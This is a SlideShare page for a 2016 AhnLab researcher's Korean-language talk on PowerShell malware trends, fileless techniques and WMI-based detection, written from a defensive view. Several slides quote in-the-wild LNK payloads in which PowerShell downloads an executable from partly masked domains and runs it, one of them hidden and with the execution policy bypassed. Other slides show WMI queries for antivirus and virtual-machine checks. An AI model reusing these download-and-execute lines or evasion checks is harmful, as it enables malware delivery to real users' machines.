SlideShare a Scribd company logo

Power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판

Minseok(Jacky) Cha, profile picture
Minseok(Jacky) Cha

PowerShell is a scripting language introduced in 2006 that is installed by default on Windows systems starting with Windows Vista. PowerShell malware has increased with the rise of Windows 7 and Windows 10. PowerShell is commonly used by ransomware downloaders and in targeted attacks. It allows fileless malware through techniques using WMI. The use of PowerShell malware is expected to increase along with JS and VBS malware, and may become cross-platform. Detection and response requires monitoring WMI for abnormal activity.

Technology
1 of 66
Downloaded 77 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
PowerMalware ?! 2016.11.18 – 공개판 안랩 시큐리티대응센터(ASEC) 분석팀 차민석 (車珉錫, CHA Minseok, Jacky Cha, mstoned7) 책임 연구원 PowerShell 를 이용한 악성코드와 기법
© AhnLab, Inc. All rights reserved. 2 :~$whoami Profile − 차민석 (車珉錫, CHA Minseok, Jacky Cha, mstoned7) − 1988년 1월 7일 : Apple ][+ 복제품으로 컴퓨터 시작 − 1989년 : Brain virus 변형 감염 − 1997년 : AhnLab 입사 − AhnLab 책임 연구원 (Senior Malware Researcher) − 시큐리티 대응센터(ASEC) 분석팀에서 악성코드 분석 및 연구 중 - 민간합동 조사단, 사이버보안 전문단 - vforum, AVED, AMTSO 멤버 - Wildlist Reporter
© AhnLab, Inc. All rights reserved. 3 :~$whoami • 책 -보안에미쳐라(2016) * Source:http://www.yes24.com/24/goods/29333992
© AhnLab, Inc. All rights reserved. 4 시작하기 전에 • 보안이 완벽한 시스템은 이 세상에 없어 - MatthewBroderick주연위험한게임(WarGames) * Source:WarGames(1983)
© AhnLab, Inc. All rights reserved. 5 Wrap up • PowerShell를 이용한 악성코드 증가 - Windows7와Windows10점유율에따름 -보통RansomwareDownloader로이용 -TargetedAttack에도이용시작포착 • WMI 이용 -Fileless악성코드제작가능 • 전망 -JS,VBS와함께PowerShell악성코드증가예상 -Multi-Platform악성코드가능성
Contents 01 02 03 04 05 06 07 PowerShell PowerShell를 이용한 악성코드 Technique 파일 종류 Fileless Technique Case Study 맺음말
01 PowerShell
© AhnLab, Inc. All rights reserved. 8 PowerShell • PowerShell - 2006년공개된ScriptLanguage -WindowsVista이후기본탑재 * Source:https://msdn.microsoft.com/en-us/powershell
© AhnLab, Inc. All rights reserved. 9 Windows Management Instrumentation (WMI) • WMI - * Source:https://msdn.microsoft.com/en-us/library/aa394582(v=vs.85).aspx
© AhnLab, Inc. All rights reserved. 10 Windows Management Instrumentation (WMI) • WMIArchitecture - * Source:http://oversitesentry.com/blackhat-presentation-wmi-architecture-used-to-attack/
© AhnLab, Inc. All rights reserved. 11 PowerShell + WMI • AntiVirus제품 정보 얻기 - get-wmiobject -Namespace rootSecurityCenter2 -Class AntiVirusProduct
© AhnLab, Inc. All rights reserved. 12 PowerShell + WMI • 가상환경 검사 - Get-WmiObject –Class Win32_ComputerSystem
02 PowerShell을 이용한 악성코드
© AhnLab, Inc. All rights reserved. Timeline Monad 발표 1993 1998 2000 2004 2006 2007 2013 2014 2015 Poweliks 2016 PowerShell 공개 PowerShell + Macro 등장 VB Script 악성코드 PowerShell Downloader 범람 PowerShell 악성코드 POC Macro virus 2017 Loveletter PowerShell Ransomware Kovter 향상된 Batch virus BedepPhase WMI 이용한 Fileless 침해사고
© AhnLab, Inc. All rights reserved. 15 1995 – Macro virus • 1995년 – 2001년: Macro virus전성기 - * Source:
© AhnLab, Inc. All rights reserved. 16 2000 - Loveletter • 2000년 5월 4일 LoveLettervirus - email로전파 -Iloveyou라는메일제목의사회공학기법사용 -그림,음악파일파괴
© AhnLab, Inc. All rights reserved. 17 2004 – Monad • 우려 - 2004년Monad개발 * Source:https://www.virusbulletin.com/conference/vb2004/abstracts/return-script-viruses
© AhnLab, Inc. All rights reserved. 18 2006 - PowerShell 악성코드 POC • PowerShellPOC 악성코드 - * Source:https://www.symantec.com/security_response/writeup.jsp?docid=2006-080216-3625-99&tabid=2
© AhnLab, Inc. All rights reserved. 19 2006 - PowerShell Released • PowerShellReleased - * Source:http://www.symantec.com/connect/ru/blogs/powershell-released?page=1
© AhnLab, Inc. All rights reserved. 20 2013 – PowerShell Ransomware • PowerShellRansomware등장 - * Source:https://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/
© AhnLab, Inc. All rights reserved. 21 2014 - Poweliks • Poweliks -Registry내저장 * Source:http://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/
© AhnLab, Inc. All rights reserved. 22 2014 - Phase • Phase -2013년발견된Solarbot변형 * Source:http://blog.trendmicro.com/trendlabs-security-intelligence/without-a-trace-fileless-malware-spotted-in-the-wild/
© AhnLab, Inc. All rights reserved. 23 2015 – WMI 악용 • Black Hat2015 - * Source:https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A- Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf
© AhnLab, Inc. All rights reserved. 24 2015 - PowerShell 악성코드 증가 시작 • PowerShell악성코드 증가 - * Source:https://securelist.com/blog/research/72417/the-rise-of-net-and-powershell-malware/
© AhnLab, Inc. All rights reserved. 25 2016 - Macro + PowerShell • Macro + PowerShell - * Source:http://researchcenter.paloaltonetworks.com/2016/03/powersniff-malware-used-in-macro-based-attacks/
© AhnLab, Inc. All rights reserved. 26 2016 - PowerShell 이용한 악성코드 유행 • PowerShell이용한 악성코드 유행 - * Source:https://blogs.mcafee.com/mcafee-labs/malware-employs-powershell-to-infect-systems/
03 Technical
© AhnLab, Inc. All rights reserved. In-the-Wild 악성코드 조건 조건 많은 사용자 보안 체계 허점 손쉬운 제작
© AhnLab, Inc. All rights reserved. PowerShell 악성코드 장점 장점 강력한 기능 손쉬운 제작 행위 기반 제품 우회 가능성
© AhnLab, Inc. All rights reserved. 30 주요 감염 경로 • 주요 감염 경로 Mail − 첨부 파일 혹은 Link icon Web Browser − Exploit Kit 이용 − Fileless 악성코드 감염에도 이용
© AhnLab, Inc. All rights reserved. 31 감염 경로 • Mail -
© AhnLab, Inc. All rights reserved. 32 PowerShell 실행 • 실행 권한 - DownloadFile명령의개별명령과스크립트실행테스트 -개별명령은실행되지만스크립트는정책상실행되지않음
© AhnLab, Inc. All rights reserved. 33 PowerShell 실행 • Bypass PowerShell executionpolicies - * Source:https://technet.microsoft.com/en-us/library/ee176847.aspx
© AhnLab, Inc. All rights reserved. 34 PowerShell 실행 • Bypass PowerShell executionpolicies - * Source:http://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html
© AhnLab, Inc. All rights reserved. 35 기능 • Downloader혹은 Dropper - * Source:https://blogs.mcafee.com/mcafee-labs/malware-employs-powershell-to-infect-systems/
04 파일 종류
© AhnLab, Inc. All rights reserved. 종류 종류 Office (DOC, DOCM, XLS, XLSM) Shortcut (LNK) PowerShell (PS1) Windows ScriptFile (WSF), HTML Application (HTA) Java Script /Visual Basic Script (JS, JSE, VBS, VBE, WSF, HTA)
© AhnLab, Inc. All rights reserved. 38 Java Script - JS • JavaScript(JS) -
© AhnLab, Inc. All rights reserved. 39 Visual Basic Script • VisualBasicScript(VBS) -
© AhnLab, Inc. All rights reserved. 40 Windows Script File (WSF) • WSF(WindowsScriptFile) - 대부분JavaScript
© AhnLab, Inc. All rights reserved. 41 Windows Script File (WSF) • WSF(WindowsScriptFile) -
© AhnLab, Inc. All rights reserved. 42 HTMLApplication (HTA) • HTMLApplication(HTA) -대부분JavaScript
© AhnLab, Inc. All rights reserved. 43 Office (DOC, DOCM, XLS, XLSM) • Macro 포함 문서 -
© AhnLab, Inc. All rights reserved. 44 Shortcut (LNK) • LNK -
© AhnLab, Inc. All rights reserved. 45 Shortcut (LNK) • Download - %WINDIR%System32WindowsPowerShellv1.0powershell.exe $cmd = 'Start-Process';$b = '%TEMP%tes'+'t3.e'+'xe'; $a = New-Object System.Net.WebClient; $a.DownloadFile('http://*****ennox.com/wp-includes/putty.exe','%TEMP%tes'+'t3.e'+'xe'); &($cmd) -FilePath $b;
© AhnLab, Inc. All rights reserved. 46 Shortcut (LNK) • Download - C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://dire****.com/2D2A/bg.exe','%APPDATA%Example.exe'); cmd /c '%APPDATA%Example.exe'
© AhnLab, Inc. All rights reserved. 47 Shortcut (LNK) • Encoding - C:WindowsSysWOW64WindowsPowerShellv1.0powershell.exe powershell.exe -EncodedCommand UABvAHc………
© AhnLab, Inc. All rights reserved. 48 PowerShell (PS1) • PowerShell -
05 Fileless Technique
© AhnLab, Inc. All rights reserved. 50 Fileless • FilelessTechnique으로이용 -Poweliks * Source:https://blog.gdatasoftware.com/2014/07/23947-poweliks-the-persistent-malware-without-a-file
© AhnLab, Inc. All rights reserved. 51 Fileless • FilelessTechnique으로이용 -Poweliks
© AhnLab, Inc. All rights reserved. 52 Fileless 악성코드 • Kovter - Run항목읽을수없음
© AhnLab, Inc. All rights reserved. 53 Fileless 악성코드 • Kovter -mshta.exe를통해Script실행
© AhnLab, Inc. All rights reserved. 54 Fileless 악성코드 • Kovter -인코딩된데이터
06 Case Study
07 맺음말
© AhnLab, Inc. All rights reserved. 57 Error • WindowsPowerShell작동 중지 - 갑자기WindowsPowerShell에러가발생할수있음
© AhnLab, Inc. All rights reserved. 58 Response • WMI for Detectionand Response - * Source:https://ics-cert.us-cert.gov/sites/default/files/documents/WMI_for_Detection_and_Response_S508C.pdf
© AhnLab, Inc. All rights reserved. 59 전망 • PowerShell의확장 - * Source:https://blogs.msdn.microsoft.com/powershell/2016/08/18/powershell-on-linux-and-open-source-2
© AhnLab, Inc. All rights reserved. 전망 전망 JS, VBS 대체 ?! Obfuscation Cross-Platform
© AhnLab, Inc. All rights reserved. 61 Wrap up • PowerShell를 이용한 악성코드 증가 - Windows7와Windows10점유율에따름 -보통RansomwareDownloader로이용 -TargetedAttack에도이용시작포착 • WMI 이용 -Fileless악성코드제작가능 • 전망 -JS,VBS와함께PowerShell악성코드증가예상 -Multi-Platform악성코드가능성
© AhnLab, Inc. All rights reserved. 62 현재의 보안 문제 • Not reallya fair fight * source:http://image-store.slidesharecdn.com/81268b95-5c3b-4604-9129-d83ab3dc4600-large.png
© AhnLab, Inc. All rights reserved. 63 현재의 보안 문제 • 모두가 함께 해야 하는 보안 * source:http://www.security-marathon.be/?p=1786
© AhnLab, Inc. All rights reserved. 64 Q&A email : minseok.cha@ahnlab.com / mstoned7@gmail.com http://xcoolcat7.tistory.com https://twitter.com/xcoolcat7, https://twitter.com/mstoned7
© AhnLab, Inc. All rights reserved. 65 Reference • Ryan Kazanciyan& Matt Hastings,‘InvestigatingPowerShellAttack’,2014 • Matt Graeber, ‘Abusing WindowsManagementInstrumentation(WMI) to Builda Persistent, Asyncronous,andFilelessBackdoor’,2015 • Santiago M.Pontiroli &F. Roberto Martinez, ‘TheTao of .NETand PowerShellMalwareAnalysis’,2015 • 김승훈/AhnLab,‘매크로 다운로더 분석’, 2016
Power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판

More Related Content

PDF
임베디드 리눅스 악성코드로 본 사물인터넷 보안 차민석 20150406_코드게이트 발표판
Minseok(Jacky) Cha
 
PDF
Embedded linux 악성코드 동향 20150323 v1.0 공개판
Minseok(Jacky) Cha
 
PDF
Tick group @avar2019 20191111 cha minseok_publish
Minseok(Jacky) Cha
 
PDF
From stealing confidential data to revenue-generating attacks
Minseok(Jacky) Cha
 
PDF
Real-Time Static Malware Analysis using NepenthesFE
Wasim Halani
 
PPTX
Revealing the Attack Operations Targeting Japan by Shusei Tomonaga & Yuu Nak...
CODE BLUE
 
PPTX
Test & Tea : ITSEC testing, manual vs automated
Zoltan Balazs
 
PPTX
Ransomware - what is it, how to protect against it
Zoltan Balazs
 
임베디드 리눅스 악성코드로 본 사물인터넷 보안 차민석 20150406_코드게이트 발표판
Minseok(Jacky) Cha
 
Embedded linux 악성코드 동향 20150323 v1.0 공개판
Minseok(Jacky) Cha
 
Tick group @avar2019 20191111 cha minseok_publish
Minseok(Jacky) Cha
 
From stealing confidential data to revenue-generating attacks
Minseok(Jacky) Cha
 
Real-Time Static Malware Analysis using NepenthesFE
Wasim Halani
 
Revealing the Attack Operations Targeting Japan by Shusei Tomonaga & Yuu Nak...
CODE BLUE
 
Test & Tea : ITSEC testing, manual vs automated
Zoltan Balazs
 
Ransomware - what is it, how to protect against it
Zoltan Balazs
 

What's hot (20)

PPT
Next Generation Advanced Malware Detection and Defense
Luca Simonelli
 
PDF
Infosecurity.be 2019: What are relevant open source security tools you should...
B.A.
 
PDF
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
CODE BLUE
 
PPTX
GreyNoise - Lowering Signal To Noise
Andrew Morris
 
PDF
CMS Hacking Tricks - DerbyCon 4 - 2014
Greg Foss
 
PPTX
OSX/Pirrit: The blue balls of OS X adware
Amit Serper
 
PDF
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
Andrew Morris
 
PDF
Practical White Hat Hacker Training - Post Exploitation
PRISMA CSI
 
PDF
Practical White Hat Hacker Training - Introduction to Cyber Security
PRISMA CSI
 
PDF
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CanSecWest
 
PPTX
Detection Rules Coverage
Sunny Neo
 
PPTX
Malware in the Wild: Evolving to Evade Detection
Lastline, Inc.
 
PPTX
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Lastline, Inc.
 
PDF
(130216) #fitalk potentially malicious ur ls
INSIGHT FORENSIC
 
PDF
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Lastline, Inc.
 
PPTX
Now you see me, now you don't: chasing evasive malware - Giovanni Vigna
Lastline, Inc.
 
PPT
Attacking Embedded Devices (No Axe Required)
Security Weekly
 
PPTX
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...
CODE BLUE
 
PDF
Threat Hunting with Cyber Kill Chain
Suwitcha Musijaral CISSP,CISA,GWAPT,SNORTCP
 
PPTX
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
grecsl
 
Next Generation Advanced Malware Detection and Defense
Luca Simonelli
 
Infosecurity.be 2019: What are relevant open source security tools you should...
B.A.
 
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
CODE BLUE
 
GreyNoise - Lowering Signal To Noise
Andrew Morris
 
CMS Hacking Tricks - DerbyCon 4 - 2014
Greg Foss
 
OSX/Pirrit: The blue balls of OS X adware
Amit Serper
 
ShmooCon 2015: No Budget Threat Intelligence - Tracking Malware Campaigns on ...
Andrew Morris
 
Practical White Hat Hacker Training - Post Exploitation
PRISMA CSI
 
Practical White Hat Hacker Training - Introduction to Cyber Security
PRISMA CSI
 
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
CanSecWest
 
Detection Rules Coverage
Sunny Neo
 
Malware in the Wild: Evolving to Evade Detection
Lastline, Inc.
 
Reacting to Advanced, Unknown Attacks in Real-Time with Lastline
Lastline, Inc.
 
(130216) #fitalk potentially malicious ur ls
INSIGHT FORENSIC
 
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Lastline, Inc.
 
Now you see me, now you don't: chasing evasive malware - Giovanni Vigna
Lastline, Inc.
 
Attacking Embedded Devices (No Axe Required)
Security Weekly
 
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ...
CODE BLUE
 
Threat Hunting with Cyber Kill Chain
Suwitcha Musijaral CISSP,CISA,GWAPT,SNORTCP
 
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
grecsl
 
Ad

Similar to Power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판 (10)

PDF
The Dark Side of PowerShell by George Dobrea
EC-Council
 
PDF
Who Should Use Powershell? You Should Use Powershell!
Ben Finke
 
PDF
From P0W3R to SH3LL
Arthur Paixão
 
PDF
SANS DFIR Prague: PowerShell & WMI
Joe Slowik
 
PPTX
Incorporating PowerShell into your Arsenal with PS>Attack
jaredhaight
 
PDF
Power on, Powershell
Roo7break
 
PDF
Empire Work shop
Haydn Johnson
 
PDF
Ta505 tracking starting at zero
BRKDWN
 
PPTX
Pwning with powershell
jaredhaight
 
PPTX
Client side attacks using PowerShell
Nikhil Mittal
 
The Dark Side of PowerShell by George Dobrea
EC-Council
 
Who Should Use Powershell? You Should Use Powershell!
Ben Finke
 
From P0W3R to SH3LL
Arthur Paixão
 
SANS DFIR Prague: PowerShell & WMI
Joe Slowik
 
Incorporating PowerShell into your Arsenal with PS>Attack
jaredhaight
 
Power on, Powershell
Roo7break
 
Empire Work shop
Haydn Johnson
 
Ta505 tracking starting at zero
BRKDWN
 
Pwning with powershell
jaredhaight
 
Client side attacks using PowerShell
Nikhil Mittal
 
Ad

More from Minseok(Jacky) Cha (16)

PDF
2017년 3분기 정보보안 소식 20180107 차민석
Minseok(Jacky) Cha
 
PDF
Targeted attacks on major industry sectors in south korea 20171201 cha minseo...
Minseok(Jacky) Cha
 
PDF
Targeted attacks on major industry sectores in south korea 20170927 cha minse...
Minseok(Jacky) Cha
 
PDF
2017년 1분기 정보보안 소식 20170528 차민석_공개판
Minseok(Jacky) Cha
 
PDF
2016년 4분기 주요 정보보안 소식 20170101 차민석_공개판
Minseok(Jacky) Cha
 
PDF
2016년 3분기 주요 정보보안 소식 20161227 차민석_공개판
Minseok(Jacky) Cha
 
PDF
사회기반시설 공격 동향 분석보고서 차민석 20161029_레몬 정보보호 세미나
Minseok(Jacky) Cha
 
PDF
2016년 2분기 주요 정보보안 소식 차민석 20160815_공개판
Minseok(Jacky) Cha
 
PDF
2016년 1분기 주요 정보보안 소식 차민석 20160703_공개판
Minseok(Jacky) Cha
 
PDF
2015년 4분기 주요 정보보안 소식 차민석 20160410_공개판
Minseok(Jacky) Cha
 
PDF
2015년 3분기 주요 정보보안 소식 차민석 20160117_공개판
Minseok(Jacky) Cha
 
PDF
Csi cyber season 1 episode 1 차민석 20160113
Minseok(Jacky) Cha
 
PDF
백신 프로그램의 원리와 동작 차민석 20151117_security plus 발표판
Minseok(Jacky) Cha
 
PDF
0과 1의 비밀을 밝히는 악성코드 분석가 차민석 20151117_security plus 발표판
Minseok(Jacky) Cha
 
PDF
2015년 2분기 주요 정보보안 소식 차민석 공개판_20150810
Minseok(Jacky) Cha
 
PDF
2015년 1분기 주요 정보보안 소식 20150512 공개판
Minseok(Jacky) Cha
 
2017년 3분기 정보보안 소식 20180107 차민석
Minseok(Jacky) Cha
 
Targeted attacks on major industry sectors in south korea 20171201 cha minseo...
Minseok(Jacky) Cha
 
Targeted attacks on major industry sectores in south korea 20170927 cha minse...
Minseok(Jacky) Cha
 
2017년 1분기 정보보안 소식 20170528 차민석_공개판
Minseok(Jacky) Cha
 
2016년 4분기 주요 정보보안 소식 20170101 차민석_공개판
Minseok(Jacky) Cha
 
2016년 3분기 주요 정보보안 소식 20161227 차민석_공개판
Minseok(Jacky) Cha
 
사회기반시설 공격 동향 분석보고서 차민석 20161029_레몬 정보보호 세미나
Minseok(Jacky) Cha
 
2016년 2분기 주요 정보보안 소식 차민석 20160815_공개판
Minseok(Jacky) Cha
 
2016년 1분기 주요 정보보안 소식 차민석 20160703_공개판
Minseok(Jacky) Cha
 
2015년 4분기 주요 정보보안 소식 차민석 20160410_공개판
Minseok(Jacky) Cha
 
2015년 3분기 주요 정보보안 소식 차민석 20160117_공개판
Minseok(Jacky) Cha
 
Csi cyber season 1 episode 1 차민석 20160113
Minseok(Jacky) Cha
 
백신 프로그램의 원리와 동작 차민석 20151117_security plus 발표판
Minseok(Jacky) Cha
 
0과 1의 비밀을 밝히는 악성코드 분석가 차민석 20151117_security plus 발표판
Minseok(Jacky) Cha
 
2015년 2분기 주요 정보보안 소식 차민석 공개판_20150810
Minseok(Jacky) Cha
 
2015년 1분기 주요 정보보안 소식 20150512 공개판
Minseok(Jacky) Cha
 

Recently uploaded (20)

PDF
Reach Out and Touch Someone: Haptics and Empathic Computing
Mark Billinghurst
 
DOCX
The AUB Centre for AI in Media Proposal.docx
GAONE9
 
PDF
Electronic commerce courselecture one. Pdf
OmerMohamed64
 
PPTX
20250228 LYD VKU AI Blended-Learning.pptx
DatVoNgoc
 
PPTX
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
ReZa AdineH
 
PDF
Dropbox Q2 2025 Financial Results & Investor Presentation
Dropbox
 
PPTX
Cloud computing and distributed systems.
kkkkkhan
 
PDF
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
PDF
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 
PDF
Review of recent advances in non-invasive hemoglobin estimation
IAESIJAI
 
PPTX
Detection-First SIEM: Rule Types, Dashboards, and Threat-Informed Strategy
ReZa AdineH
 
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
PPTX
Big Data Technologies - Introduction.pptx
kuthubussaman1
 
PDF
NewMind AI Weekly Chronicles - August'25 Week I
NewMind AI
 
PDF
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
SOFTTECHHUB
 
PDF
Approach and Philosophy of On baking technology
30anthuong17
 
PDF
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Safe Software
 
PDF
Optimiser vos workloads AI/ML sur Amazon EC2 et AWS Graviton
Julien SIMON
 
PDF
Network Security Unit 5.pdf for BCA BBA.
Serpent6
 
PDF
MIND Revenue Release Quarter 2 2025 Press Release
MIND CTI
 
Reach Out and Touch Someone: Haptics and Empathic Computing
Mark Billinghurst
 
The AUB Centre for AI in Media Proposal.docx
GAONE9
 
Electronic commerce courselecture one. Pdf
OmerMohamed64
 
20250228 LYD VKU AI Blended-Learning.pptx
DatVoNgoc
 
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
ReZa AdineH
 
Dropbox Q2 2025 Financial Results & Investor Presentation
Dropbox
 
Cloud computing and distributed systems.
kkkkkhan
 
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 
Review of recent advances in non-invasive hemoglobin estimation
IAESIJAI
 
Detection-First SIEM: Rule Types, Dashboards, and Threat-Informed Strategy
ReZa AdineH
 
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
Big Data Technologies - Introduction.pptx
kuthubussaman1
 
NewMind AI Weekly Chronicles - August'25 Week I
NewMind AI
 
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
SOFTTECHHUB
 
Approach and Philosophy of On baking technology
30anthuong17
 
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Safe Software
 
Optimiser vos workloads AI/ML sur Amazon EC2 et AWS Graviton
Julien SIMON
 
Network Security Unit 5.pdf for BCA BBA.
Serpent6
 
MIND Revenue Release Quarter 2 2025 Press Release
MIND CTI
 

Power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판

  • 1. PowerMalware ?! 2016.11.18 – 공개판 안랩 시큐리티대응센터(ASEC) 분석팀 차민석 (車珉錫, CHA Minseok, Jacky Cha, mstoned7) 책임 연구원 PowerShell 를 이용한 악성코드와 기법
  • 2. © AhnLab, Inc. All rights reserved. 2 :~$whoami Profile − 차민석 (車珉錫, CHA Minseok, Jacky Cha, mstoned7) − 1988년 1월 7일 : Apple ][+ 복제품으로 컴퓨터 시작 − 1989년 : Brain virus 변형 감염 − 1997년 : AhnLab 입사 − AhnLab 책임 연구원 (Senior Malware Researcher) − 시큐리티 대응센터(ASEC) 분석팀에서 악성코드 분석 및 연구 중 - 민간합동 조사단, 사이버보안 전문단 - vforum, AVED, AMTSO 멤버 - Wildlist Reporter
  • 3. © AhnLab, Inc. All rights reserved. 3 :~$whoami • 책 -보안에미쳐라(2016) * Source:http://www.yes24.com/24/goods/29333992
  • 4. © AhnLab, Inc. All rights reserved. 4 시작하기 전에 • 보안이 완벽한 시스템은 이 세상에 없어 - MatthewBroderick주연위험한게임(WarGames) * Source:WarGames(1983)
  • 5. © AhnLab, Inc. All rights reserved. 5 Wrap up • PowerShell를 이용한 악성코드 증가 - Windows7와Windows10점유율에따름 -보통RansomwareDownloader로이용 -TargetedAttack에도이용시작포착 • WMI 이용 -Fileless악성코드제작가능 • 전망 -JS,VBS와함께PowerShell악성코드증가예상 -Multi-Platform악성코드가능성
  • 8. © AhnLab, Inc. All rights reserved. 8 PowerShell • PowerShell - 2006년공개된ScriptLanguage -WindowsVista이후기본탑재 * Source:https://msdn.microsoft.com/en-us/powershell
  • 9. © AhnLab, Inc. All rights reserved. 9 Windows Management Instrumentation (WMI) • WMI - * Source:https://msdn.microsoft.com/en-us/library/aa394582(v=vs.85).aspx
  • 10. © AhnLab, Inc. All rights reserved. 10 Windows Management Instrumentation (WMI) • WMIArchitecture - * Source:http://oversitesentry.com/blackhat-presentation-wmi-architecture-used-to-attack/
  • 11. © AhnLab, Inc. All rights reserved. 11 PowerShell + WMI • AntiVirus제품 정보 얻기 - get-wmiobject -Namespace rootSecurityCenter2 -Class AntiVirusProduct
  • 12. © AhnLab, Inc. All rights reserved. 12 PowerShell + WMI • 가상환경 검사 - Get-WmiObject –Class Win32_ComputerSystem
  • 14. © AhnLab, Inc. All rights reserved. Timeline Monad 발표 1993 1998 2000 2004 2006 2007 2013 2014 2015 Poweliks 2016 PowerShell 공개 PowerShell + Macro 등장 VB Script 악성코드 PowerShell Downloader 범람 PowerShell 악성코드 POC Macro virus 2017 Loveletter PowerShell Ransomware Kovter 향상된 Batch virus BedepPhase WMI 이용한 Fileless 침해사고
  • 15. © AhnLab, Inc. All rights reserved. 15 1995 – Macro virus • 1995년 – 2001년: Macro virus전성기 - * Source:
  • 16. © AhnLab, Inc. All rights reserved. 16 2000 - Loveletter • 2000년 5월 4일 LoveLettervirus - email로전파 -Iloveyou라는메일제목의사회공학기법사용 -그림,음악파일파괴
  • 17. © AhnLab, Inc. All rights reserved. 17 2004 – Monad • 우려 - 2004년Monad개발 * Source:https://www.virusbulletin.com/conference/vb2004/abstracts/return-script-viruses
  • 18. © AhnLab, Inc. All rights reserved. 18 2006 - PowerShell 악성코드 POC • PowerShellPOC 악성코드 - * Source:https://www.symantec.com/security_response/writeup.jsp?docid=2006-080216-3625-99&tabid=2
  • 19. © AhnLab, Inc. All rights reserved. 19 2006 - PowerShell Released • PowerShellReleased - * Source:http://www.symantec.com/connect/ru/blogs/powershell-released?page=1
  • 20. © AhnLab, Inc. All rights reserved. 20 2013 – PowerShell Ransomware • PowerShellRansomware등장 - * Source:https://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/
  • 21. © AhnLab, Inc. All rights reserved. 21 2014 - Poweliks • Poweliks -Registry내저장 * Source:http://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/
  • 22. © AhnLab, Inc. All rights reserved. 22 2014 - Phase • Phase -2013년발견된Solarbot변형 * Source:http://blog.trendmicro.com/trendlabs-security-intelligence/without-a-trace-fileless-malware-spotted-in-the-wild/
  • 23. © AhnLab, Inc. All rights reserved. 23 2015 – WMI 악용 • Black Hat2015 - * Source:https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A- Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf
  • 24. © AhnLab, Inc. All rights reserved. 24 2015 - PowerShell 악성코드 증가 시작 • PowerShell악성코드 증가 - * Source:https://securelist.com/blog/research/72417/the-rise-of-net-and-powershell-malware/
  • 25. © AhnLab, Inc. All rights reserved. 25 2016 - Macro + PowerShell • Macro + PowerShell - * Source:http://researchcenter.paloaltonetworks.com/2016/03/powersniff-malware-used-in-macro-based-attacks/
  • 26. © AhnLab, Inc. All rights reserved. 26 2016 - PowerShell 이용한 악성코드 유행 • PowerShell이용한 악성코드 유행 - * Source:https://blogs.mcafee.com/mcafee-labs/malware-employs-powershell-to-infect-systems/
  • 28. © AhnLab, Inc. All rights reserved. In-the-Wild 악성코드 조건 조건 많은 사용자 보안 체계 허점 손쉬운 제작
  • 29. © AhnLab, Inc. All rights reserved. PowerShell 악성코드 장점 장점 강력한 기능 손쉬운 제작 행위 기반 제품 우회 가능성
